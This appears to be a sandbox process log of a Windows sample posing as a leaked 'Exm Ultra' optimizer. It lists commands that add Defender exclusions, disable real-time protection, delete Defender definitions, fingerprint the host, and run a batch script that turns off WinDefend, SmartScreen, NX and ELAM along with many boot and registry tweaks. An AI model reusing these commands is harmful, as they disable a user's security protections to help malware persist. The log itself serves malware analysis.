"C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4380 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4380 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:8
C:\Users\Admin\AppData\Local\Temp\7zOCD9D2288\Exm Ultra Version Leaked.exe
"C:\Users\Admin\AppData\Local\Temp\7zOCD9D2288\Exm Ultra Version Leaked.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4428 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --no-appcompat-clear --mojo-platform-channel-handle=4564 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4996 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:8
C:\Users\Admin\AppData\Local\Temp\7zOCD9D2288\Exm Ultra Version Leaked.exe
"C:\Users\Admin\AppData\Local\Temp\7zOCD9D2288\Exm Ultra Version Leaked.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=5288 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=5316 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5432 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\7zOCD9D2288\Exm Ultra Version Leaked.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "start bound.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Users\Admin\AppData\Local\Temp\bound.exe
bound.exe
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
C:\Windows\SYSTEM32\cmd.exe
cmd /c "Fn Opti.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\7zOCD9D2288\Exm Ultra Version Leaked.exe'
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=5728 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4660 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=5796 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:8
C:\Windows\system32\timeout.exe
timeout /t 2
C:\Windows\system32\timeout.exe
timeout /t 2
C:\Windows\system32\fsutil.exe
fsutil behavior query memoryusage
C:\Windows\system32\fsutil.exe
fsutil behavior set memoryusage 2
C:\Windows\system32\bcdedit.exe
bcdedit /set increaseuserva 8000
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\system32\ipconfig.exe
ipconfig /renew
C:\Windows\system32\ipconfig.exe
ipconfig /flushdns
C:\Windows\system32\netsh.exe
netsh winsock reset
C:\Windows\system32\netsh.exe
netsh int tcp set global chimney=enabled
C:\Windows\system32\netsh.exe
netsh int tcp set global autotuninglevel=normal
C:\Windows\system32\netsh.exe
netsh int tcp set supplemental
C:\Windows\system32\netsh.exe
netsh int tcp set global dca=enabled
C:\Windows\system32\netsh.exe
netsh int tcp set global netdma=enabled
C:\Windows\system32\netsh.exe
netsh int tcp set global congestionprovider=ctcp
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="StopThrottling" dir=in
C:\Windows\system32\bcdedit.exe
bcdedit /set allowedinmemorysettings 0
C:\Windows\system32\bcdedit.exe
bcdedit /deletevalue useplatformclock
C:\Windows\system32\bcdedit.exe
bcdedit /set useplatformtick Yes
C:\Windows\system32\bcdedit.exe
bcdedit /set tscsyncpolicy Enhanced
C:\Windows\system32\bcdedit.exe
bcdedit /set debug No
C:\Windows\system32\bcdedit.exe
bcdedit /set isolatedcontext No
C:\Windows\system32\bcdedit.exe
bcdedit /set pae ForceEnable
C:\Windows\system32\bcdedit.exe
bcdedit /set bootmenupolicy Legacy
C:\Windows\system32\bcdedit.exe
bcdedit /set usefirmwarepcisettings No
C:\Windows\system32\bcdedit.exe
bcdedit /set sos Yes
C:\Windows\system32\bcdedit.exe
bcdedit /set disabledynamictick Yes
C:\Windows\system32\bcdedit.exe
bcdedit /set disableelamdrivers Yes
C:\Windows\system32\bcdedit.exe
bcdedit /set quietboot Yes
C:\Windows\system32\bcdedit.exe
bcdedit /set x2apicpolicy Enable
C:\Windows\system32\bcdedit.exe
bcdedit /set vsmlaunchtype Off
C:\Windows\system32\bcdedit.exe
bcdedit /set usephysicaldestination No
C:\Windows\system32\bcdedit.exe
bcdedit /set ems No
C:\Windows\system32\bcdedit.exe
bcdedit /set firstmegabytepolicy UseAll
C:\Windows\system32\bcdedit.exe
bcdedit /set configaccesspolicy Default
C:\Windows\system32\bcdedit.exe
bcdedit /set linearaddress57 optin
C:\Windows\system32\bcdedit.exe
bcdedit /set noumex Yes
C:\Windows\system32\bcdedit.exe
bcdedit /set bootems No
C:\Windows\system32\bcdedit.exe
bcdedit /set graphicsmodedisabled No
C:\Windows\system32\bcdedit.exe
bcdedit /set extendedinput Yes
C:\Windows\system32\bcdedit.exe
bcdedit /set highestmode Yes
C:\Windows\system32\bcdedit.exe
bcdedit /set forcefipscrypto No
C:\Windows\system32\bcdedit.exe
bcdedit /set perfmem 0
C:\Windows\system32\bcdedit.exe
bcdedit /set configflags 0
C:\Windows\system32\bcdedit.exe
bcdedit /set uselegacyapicmode No
C:\Windows\system32\bcdedit.exe
bcdedit /set onecpu No
C:\Windows\system32\bcdedit.exe
bcdedit /set halbreakpoint No
C:\Windows\system32\bcdedit.exe
bcdedit /set forcelegacyplatform No
C:\Windows\system32\bcdedit.exe
bcdedit /set allowedinmemorysettings 0
C:\Windows\system32\bcdedit.exe
bcdedit /deletevalue useplatformclock
C:\Windows\system32\bcdedit.exe
bcdedit /set useplatformtick Yes
C:\Windows\system32\bcdedit.exe
bcdedit /set tscsyncpolicy Enhanced
C:\Windows\system32\bcdedit.exe
bcdedit /set debug No
C:\Windows\system32\bcdedit.exe
bcdedit /set isolatedcontext No
C:\Windows\system32\bcdedit.exe
bcdedit /set pae ForceEnable
C:\Windows\system32\bcdedit.exe
bcdedit /set bootmenupolicy Legacy
C:\Windows\system32\bcdedit.exe
bcdedit /set usefirmwarepcisettings No
C:\Windows\system32\bcdedit.exe
bcdedit /set sos Yes
C:\Windows\system32\bcdedit.exe
bcdedit /set disabledynamictick Yes
C:\Windows\system32\bcdedit.exe
bcdedit /set disableelamdrivers Yes
C:\Windows\system32\bcdedit.exe
bcdedit /set quietboot Yes
C:\Windows\system32\bcdedit.exe
bcdedit /set x2apicpolicy Enable
C:\Windows\system32\bcdedit.exe
bcdedit /set vsmlaunchtype Off
C:\Windows\system32\bcdedit.exe
bcdedit /set usephysicaldestination No
C:\Windows\system32\bcdedit.exe
bcdedit /set ems No
C:\Windows\system32\bcdedit.exe
bcdedit /set firstmegabytepolicy UseAll
C:\Windows\system32\bcdedit.exe
bcdedit /set configaccesspolicy Default
C:\Windows\system32\bcdedit.exe
bcdedit /set linearaddress57 optin
C:\Windows\system32\bcdedit.exe
bcdedit /set noumex Yes
C:\Windows\system32\bcdedit.exe
bcdedit /set bootems No
C:\Windows\system32\bcdedit.exe
bcdedit /set graphicsmodedisabled No
C:\Windows\system32\bcdedit.exe
bcdedit /set extendedinput Yes
C:\Windows\system32\bcdedit.exe
bcdedit /set highestmode Yes
C:\Windows\system32\bcdedit.exe
bcdedit /set forcefipscrypto No
C:\Windows\system32\bcdedit.exe
bcdedit /set perfmem 0
C:\Windows\system32\bcdedit.exe
bcdedit /set configflags 0
C:\Windows\system32\bcdedit.exe
bcdedit /set uselegacyapicmode No
C:\Windows\system32\bcdedit.exe
bcdedit /set onecpu No
C:\Windows\system32\bcdedit.exe
bcdedit /set halbreakpoint No
C:\Windows\system32\bcdedit.exe
bcdedit /set forcelegacyplatform No
C:\Windows\system32\bcdedit.exe
bcdedit /set useplatformclock no
C:\Windows\system32\bcdedit.exe
bcdedit /set useplatformtick yes
C:\Windows\system32\bcdedit.exe
bcdedit /set disabledynamictick yes
C:\Windows\system32\bcdedit.exe
bcdedit /set useplatformtick Yes
C:\Windows\system32\bcdedit.exe
bcdedit /set tscsyncpolicy Enhanced
C:\Windows\system32\bcdedit.exe
bcdedit /set disableelamdrivers Yes
C:\Windows\system32\bcdedit.exe
bcdedit /set vsmlaunchtype Off
C:\Windows\system32\bcdedit.exe
bcdedit /set firstmegabytepolicy UseAll
C:\Windows\system32\bcdedit.exe
bcdedit /set forcefipscrypto No
C:\Windows\system32\bcdedit.exe
bcdedit /set perfmem 0
C:\Windows\system32\bcdedit.exe
bcdedit /set configflags 0
C:\Windows\system32\bcdedit.exe
bcdedit /set tscsyncpolicy Enhanced
C:\Windows\system32\bcdedit.exe
bcdedit /set disabledynamictick yes
C:\Windows\system32\bcdedit.exe
bcdedit /set nx AlwaysOff
C:\Windows\system32\bcdedit.exe
bcdedit /set useplatformtick yes
C:\Windows\system32\bcdedit.exe
bcdedit /set vsmlaunchtype Off
C:\Windows\system32\bcdedit.exe
bcdedit /set forcefipscrypto No
C:\Windows\system32\bcdedit.exe
bcdedit /timeout 2
C:\Windows\system32\bcdedit.exe
bcdedit /set useplatformclock no
C:\Windows\system32\bcdedit.exe
bcdedit /set disabledynamictick yes
C:\Windows\system32\bcdedit.exe
bcdedit /set useplatformtick yes
C:\Windows\system32\bcdedit.exe
bcdedit /set nx optout
C:\Windows\system32\bcdedit.exe
bcdedit /set bootux disabled
C:\Windows\system32\bcdedit.exe
bcdedit /set bootmenupolicy standard
C:\Windows\system32\bcdedit.exe
bcdedit /set hypervisorlaunchtype off
C:\Windows\system32\bcdedit.exe
bcdedit /set tpmbootentropy ForceDisable
C:\Windows\system32\bcdedit.exe
bcdedit /set quietboot yes
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v "restrictanonymous" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v "restrictanonymoussam" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\CloudContent" /v "DisableWindowsSpotlightFeatures" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "LastActiveClick" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "EnableBalloonTips" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "TaskbarGlomLevel" /t REG_DWORD /d "2" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "TaskbarAnimations" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "HideFileExt" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "DisableThumbnailCache" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "SeparateProcess" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "ConfirmFileDelete" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisableThumbnailsOnNetworkFolders" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "TaskbarNoNotification" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoResolveSearch" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoResolveTrack" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoDriveTypeAutoRun" /t REG_DWORD /d "221" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoLowDiskSpaceChecks" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t REG_SZ /d "Off" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Policies\Microsoft\Windows\Explorer" /v "DisableNotificationCenter" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Policies\Microsoft\Windows\Explorer" /v "NoWindowMinimizingShortcuts" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Control Panel\Desktop\WindowMetrics" /v "MinAnimate" /t REG_SZ /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\DWM" /v "CompositionPolicy" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\DWM" /v "EnableAeroPeek" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SYSTEM\ControlSet001\Services\LanmanServer\Parameters" /v "SizReqBuf" /t REG_DWORD /d "16384" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AeDebug" /v "Auto" /t REG_SZ /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\AeDebug" /v "Auto" /t REG_SZ /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "ListviewAlphaSelect" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "TaskbarAnimations" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\VisualEffects" /v "VisualFXSetting" /t REG_DWORD /d "3" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\VisualEffects\CursorShadow" /v "DefaultApplied" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\VisualEffects\DropShadow" /v "DefaultApplied" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\VisualEffects\MenuAnimation" /v "DefaultApplied" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\VisualEffects\TaskbarAnimations" /v "DefaultApplied" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Error Reporting" /v "Disabled" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Error Reporting" /v "AutoApproveOSDumps" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Error Reporting" /v "DontSendAdditionalData" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\PCHealth\ErrorReporting" /v "DoReport" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\PCHealth\ErrorReporting" /v "ShowUI" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\WOW6432Node\Microsoft\PCHealth\ErrorReporting" /v "DoReport" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\WOW6432Node\Microsoft\PCHealth\ErrorReporting" /v "ShowUI" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Control Panel\Mouse" /v "MouseHoverTime" /t REG_SZ /d "100" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "RunStartupScriptSync" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer" /v "GlobalAssocChangedCounter" /t REG_DWORD /d "91" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "AllowCortana" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "AllowCloudSearch" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "ConnectedSearchUseWeb" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "ConnectedSearchUseWebOverMeteredConnections" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "DisableWebSearch" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "AllowSearchToUseLocation" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "AllowCortanaAboveLock" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\Speech_OneCore\Preferences" /v "ModelDownloadAllowed" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\InputPersonalization\TrainedDataStore" /v "HarvestContacts" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\InputPersonalization" /v "RestrictImplicitTextCollection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\InputPersonalization" /v "RestrictImplicitInkCollection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Personalization\Settings" /v "AcceptedPrivacyPolicy" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\System\GameConfigStore" /v "GameDVR_Enabled" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\GameDVR" /v "AllowGameDVR" /t REG_DWORD /d "0" /f
C:\Windows\system32\sc.exe
sc stop dmwappushservice
C:\Windows\system32\net.exe
net stop dmwappushservice
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop dmwappushservice
C:\Windows\system32\sc.exe
sc config dmwappushservice start= disabled
C:\Windows\system32\net.exe
net stop diagnosticshub.standardcollector.service
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop diagnosticshub.standardcollector.service
C:\Windows\system32\sc.exe
sc config diagnosticshub.standardcollector.service start= disabled
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\AutoLogger\AutoLogger-Diagtrack-Listener" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\WindowsSelfHost\UI\Visibility" /v "DiagnosticErrorText" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\WindowsSelfHost\UI\Strings" /v "DiagnosticErrorText" /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\WindowsSelfHost\UI\Strings" /v "DiagnosticLinkText" /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\TabletPC" /v "PreventHandwritingDataSharing" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\HandwritingErrorReports" /v "PreventHandwritingErrorReports" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\AppCompat" /v "DisableInventory" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\AppCompat" /v "DisableUAR" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Personalization" /v "NoLockScreenCamera" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AdvertisingInfo" /v "Enabled" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\AdvertisingInfo" /v "Enabled" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Input\TIPC" /v "Enabled" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\PolicyManager\current\device\System" /v "AllowExperimentation" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\PolicyManager\current\device\Bluetooth" /v "AllowAdvertising" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\SQMClient\Windows" /v "CEIPEnable" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Messaging" /v "AllowMessageSync" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Biometrics" /v "Enabled" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\PushNotifications" /v "ToastEnabled" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
